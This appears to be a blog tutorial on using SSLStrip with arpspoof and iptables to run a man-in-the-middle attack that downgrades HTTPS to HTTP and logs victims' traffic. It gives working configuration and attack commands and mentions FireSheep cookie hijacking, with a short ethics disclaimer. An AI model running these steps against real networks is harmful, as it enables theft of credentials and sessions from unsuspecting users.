Today we’re going to be taking a closer look at a useful Kali Linux tool called SSLStrip. As the name implies, it is useful for hijacking HTTP traffic and monitoring HTTPS traffic. Basically, it serves as a type of proxy that makes standard non-encrypted HTTP connections mirror the appearance of encrypted HTTPS sessions.
Using this tool, it’s possible to “strip” the security off of HTTPS, and turn an HTTPS link into a regular, plain-vanilla HTTP link, or even change an HTTPS link to an HTTPS link with a private key that the attacker already knows. This tool is rather tricky, too, because it will even send the padlock icon to a browser to give the appearance that the connection has been secured.
Essentially, this is a sophisticated version of an MITM attack. MITM attacks are really a rather large umbrella term do describe any attack that collects user data before sending it on the appropriate destination host. And since you control that data, it’s possible to edit it and change the details before sending it on its merry way.
Installing SSLStrip and Running It
If it’s not already installed on your system, you can grab it at the usual github location. It is a Python tool, so it’s dependent upon Python 2.5 and later. I always recommend running an update before installing code, too. Not only will that ensure that all of your other packages and modules are up to date, but it will help avoid future headaches caused by contrived package dependency problems.
After that, you’re going to need to make a few configuration changes on your system as follows.
-
Ensure your computer is in forwarding mode. Simply login as root and run the following command: echo “1” > /proc/sys/net/ipv4/ip_forward
-
Edit iptables to ensure that it can intercept HTTP requests. Once again, you’ll need to be logged in as the root user. Issue the following command: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port [DESIRED-LISTENING-PORT]
-
Issue the sslstrip command from the BASH shell.
-
Finally, you’ll need to run arpspoof to facilitate the MITM attack with the following syntax: arpspoof -i [YOUR-IP-ADDRESS] -t [TARGET-IP-ADDRESS] [ROUTER-IP-ADDRESS]
SSLStrip Command Syntax
The command syntax for SSLStrip is actually rather simple when compared to some of the more advanced Kali tools, such as Metsploit. The following will serve as a reference of the command’s various options and syntax:
Usage: sslstrip <options>
Options:
-w <filename>, –write=<filename> Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l <port>, –listen=<port> Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message.
SSLStrip Usage Example
In this example, we’re going to write the results of SSLStrip to a log file. After the data is logged, you can use it as an input parameter for other hacking tools. SSL runs on port 443, but for the sake of simplicity, it’s pretty standard in the industry to setup listening ports for HTTP/HTTPS traffic on port 8080.
All of the well-known service typically run on ports below 1024, but past that, there are a lot of open ports. For that reason, it’s pretty safe to assume that port 8080 isn’t going to be used by a different service. The following is an example of using the SSLStrip command to log data after spoofing the ARP protocol:
-
sslstrip -w mylogfile.log -l 8080
Note that you’ll want to be the root user when running this command. Naturally, the -w option tells sslstrip to write the data to a file, and the -l option tells it what port to listen on.
Final Thoughts
There are a myriad of MITM tools, and some of them even allow an attacker to steal live sessions with the click of a button. Though it is old and outdated, you can still find the FireSheep code online and install it in a web browser, allowing you to hijack session cookies. Last but not least, remember to abstain from using these tools in the real world for a malicious attack. Not only is it immoral, but you could wind up facing tough legal consequences should you get caught.